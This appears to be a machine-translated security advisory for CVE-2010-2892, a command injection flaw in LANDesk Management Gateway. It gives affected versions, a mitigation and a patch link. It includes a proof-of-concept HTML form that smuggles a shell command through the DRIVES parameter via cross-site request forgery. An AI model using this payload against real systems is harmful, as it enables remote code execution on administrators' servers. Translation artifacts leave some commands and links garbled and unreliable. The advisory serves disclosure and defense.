LANDesk Management Suite HTML form request Command Injection Vulnerability
Release date:
Updated on:
Affected Systems:
LANDesk Software LANDesk Management Gateway 4.2 GSBWEB v1.61
LANDesk Software LANDesk Management Gateway 4.0 GSBWEB v1.61s
Unaffected system:
LANDesk Software LANDesk Management Gateway 4.2 GSBWEB v1.62
LANDesk Software LANDesk Management Gateway 4.0 GSBWEB v1.62
Description:
--------------------------------------------------------------------------------
Cve id: CVE-2010-2892
The Landesk Management Suite is a network management system that can control desktops, servers, and mobile devices.
Landesk does not properly verify the user source that submitted the special request. If the Administrator logs on to the device using the attacker's browser, the attacker can execute arbitrary code with the permission of gsbadmin.
<* Source: Aureliano Calvo
Link: http://marc.info /? L = full-disclosure & m = 128943189002312 & w = 2
Http://secunia.com/advisories/42188/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
/-----
<Head> <title> LANDesk PoC </title> <Body>
<Form method = "post" action = "https: // [server]/gsb/drivers. php">
<Input type = "text" name = "DRIVES" value = "; touch/tmp/ATTACKED">
<Input type = "text" name = "SECONDTIME" value = "1">
<Input type = "text" name = "ACTION" value = "getupdate">
<Input type = "submit" value = "Attack! ">
</Form>
</Body>
</Html>
-----/
Suggestion:
--------------------------------------------------------------------------------
Temporary solution:
1. Start the SSH console session, or log on to the LDMG console and start the terminal session.
2. Run the following command: mv/usr/LANDesk/broker/webroot/gsb/drivers. php ~
Vendor patch:
LANDesk Software
----------------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://community.landesk.com/support/docs/DOC-21767